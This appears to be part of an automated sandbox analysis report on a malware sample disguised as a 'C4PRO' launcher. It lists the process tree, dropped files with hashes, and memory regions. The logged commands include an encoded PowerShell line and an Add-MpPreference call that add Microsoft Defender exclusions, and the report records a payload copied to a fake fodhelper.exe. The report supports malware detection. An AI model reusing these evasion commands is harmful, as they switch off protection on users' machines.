                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4204
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4204 -s 300
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4916
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4040
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3784
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2720
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2232
                                                                                                                                                              • C:\Windows\system32\taskhostw.exe
                                                                                                                                                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2776
                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1764
                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1640
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1572
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1396
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1360
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1264
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              PID:1136
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3920
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1048
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:908
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:948
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1092
                                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3364
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3932
                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:468
                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 416 -p 3500 -ip 3500
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2420
                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 436 -p 3404 -ip 3404
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3564
                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 444 -p 352 -ip 352
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3584
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 556 -p 4204 -ip 4204
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 352 -s 248
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:2156

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER88AA.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      37KB

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B4.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A32.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      37KB

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A81.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE043.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      35KB

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0D1.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      58KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      54KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      61KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000032

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      162KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      504B

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      41B

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      46KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      20KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize: 1KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize: 2KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize: 4KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize: 4KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize: 873B

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize: 1KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize: 1KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 4KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 4KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 6KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 6KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 4KB

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize: 6KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      6KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      16B


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      72B


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe585bd7.TMP

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      48B


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      92KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      264KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      150KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      150KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      150KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      114KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe584b8b.TMP

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      113KB


                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\eb558175-a5fa-42ca-82a1-8c6bba34e0e1.tmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      150KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdvancedDefender.exe.log

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C4PROLauncher.exe.log

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      53KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      18KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      19KB

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      28KB

  • C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe

    Filesize

    9.9MB

    MD5

    bfb24a3d6d9241383bb11d6523aade77

    SHA1

    13dcc86d51e5dc57cc17e4f48a5976762d0e4c38

    SHA256

    f6143849014b82b89e25b1bed52542ed83d96d8e061411cfee0512b4f2fdec92

    SHA512

    cf9b58a65eec5aa117217427de205e1beb56f1eadad28dfe7369c0add20a8f2ed27e4b164d3ae706d34fa7b31a197600d01f0da4b128944d4ac60e112eee29bd

  • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

    Filesize

    1.4MB

    MD5

    bcaae53dc3d930c6ed4642e945fab93d

    SHA1

    ba3391fb65a312431432dc2339abadce73c0d81a

    SHA256

    6314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368

    SHA512

    9d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5

  • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

    Filesize

    1.4MB

    MD5

    b6bbab9f72c88d07b484cc339c475e75

    SHA1

    f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

    SHA256

    dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

    SHA512

    1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yfxizsy.x2w.ps1

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      60B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                                                                                    • C:\Users\Admin\Downloads\C4PROClient.rar

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      728KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      4b466d9f50b9bb1c4f167f36ef07f03f

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      c4765abe5b8e9dbe717d989522d25661b89e695a

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      20a43abca9d1d093dd553e243efd0885398afa341936cbc3af403abd21452f82

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      51d6e5d8e9b4b671c67a1fe6cff5c252d1250cc8dadcae8875c82c58fbfe84e37815dcb33690c21e89f94cd4b032a698d912c4db824f47bb3320cb5fc02c1b38

                                                                                                                                                                                                    • C:\Users\Admin\Downloads\C4PROLauncher.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      50d01eed90d148fb718db3c54a2c93fb

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      89c4fa9d729b9916af21e666094f4ba4a919ba3a

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bf2023fa0eb475cc8060edd4a1a5eea2697007f147f526025298f6ee04cc429a

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      6a2bc7b356342972c143b6be0c32682cf184db8eec669fa4f6a299b843c1da1850bcb6ce6a9d4fecd71bec5cb1e44baea73a46e922f27e569d2a05feed7e3cda

                                                                                                                                                                                                    • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      3KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      2d29fd3ae57f422e2b2121141dc82253

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      c2464c857779c0ab4f5e766f5028fcc651a6c6b7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68


                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/3672-748-0x00000257F4160000-0x00000257F417C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      112KB

                                                                                                                                                                                                    • memory/3672-744-0x00007FF4B06E0000-0x00007FF4B06F0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-729-0x00000257DBB10000-0x00000257DBB20000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-728-0x00000257DBB10000-0x00000257DBB20000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-727-0x00000257DBB10000-0x00000257DBB20000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-772-0x00000257F41A0000-0x00000257F41BA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/3672-746-0x00000257F3FE0000-0x00000257F3FEA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/3672-775-0x00000257F4190000-0x00000257F419A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/3672-773-0x00000257F4000000-0x00000257F4008000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/3672-740-0x00000257F3F00000-0x00000257F3F1C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      112KB

                                                                                                                                                                                                    • memory/3672-774-0x00000257F4180000-0x00000257F4186000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      24KB

                                                                                                                                                                                                    • memory/3672-770-0x00000257F3FF0000-0x00000257F3FFA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4208-902-0x00007FF7AFCA0000-0x00007FF7B048F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      7.9MB

                                                                                                                                                                                                    • memory/4208-836-0x00007FF7AFCA0000-0x00007FF7B048F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      7.9MB

                                                                                                                                                                                                    • memory/4208-791-0x000001316F8C0000-0x000001316F8E0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      128KB

                                                                                                                                                                                                    • memory/4208-789-0x000001316F870000-0x000001316F890000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      128KB

                                                                                                                                                                                                    • memory/4348-553-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4348-556-0x0000000005D00000-0x0000000005D66000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      408KB

                                                                                                                                                                                                    • memory/4348-555-0x0000000006410000-0x0000000006432000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      136KB

                                                                                                                                                                                                    • memory/4348-554-0x0000000004BE0000-0x0000000004BEA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4348-552-0x0000000004B10000-0x0000000004BA2000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      584KB

                                                                                                                                                                                                    • memory/4348-551-0x0000000004FD0000-0x0000000005574000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                    • memory/4348-550-0x0000000000030000-0x0000000000152000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                    • memory/4536-641-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-626-0x0000000007DF0000-0x0000000007E12000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      136KB

                                                                                                                                                                                                    • memory/4536-618-0x0000000007A60000-0x0000000007A7A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/4536-643-0x000000007F5B0000-0x000000007F5C0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-587-0x0000000070240000-0x000000007028C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      304KB

                                                                                                                                                                                                    • memory/4536-639-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-638-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-585-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-620-0x000000007F5B0000-0x000000007F5C0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-577-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-582-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-621-0x0000000007AD0000-0x0000000007ADA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4536-622-0x0000000007D20000-0x0000000007DB6000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      600KB

                                                                                                                                                                                                    • memory/4536-625-0x0000000007CD0000-0x0000000007CD8000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/4536-624-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/4632-771-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4632-659-0x00000000001E0000-0x000000000034C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                    • memory/4632-679-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4632-711-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-778-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-750-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-749-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-760-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB